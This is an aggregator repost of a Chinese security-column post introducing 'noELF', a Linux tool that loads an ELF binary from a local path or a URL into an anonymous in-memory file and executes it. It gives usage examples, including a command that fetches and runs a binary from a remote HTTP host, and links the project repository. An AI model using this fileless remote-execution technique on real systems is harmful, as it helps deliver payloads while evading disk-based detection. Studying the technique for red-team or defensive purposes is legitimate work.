今天看啥  ›  专栏  ›  编码安全研究

Linux内存加载远程可执行文件

编码安全研究  · 公众号  ·  · 2024-03-30 21:18
介绍通过syscall创建匿名文件将elf写入后执行,支持远程加载可执行文件达到内存加载的目的。部分代码参考自ateam ptrace项目,但考虑到内核环境适配以及局限性的问题,没有使用项目中提到采用fork并修改子进程栈中要执行内容的做法。用法示例./noELF {PATH/URL} {argv}本地ELF文件加载./noElf /bin/ls -al远程ELF文件加载python3 -m http.server 8000./noElf http://10.10.10.10:8000/ls -al下载地址https://github.com/seventeenman/noELF侵权请私聊公众号删文   学习更多技术,关注我:   觉得文章不错给点个‘再看’吧 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照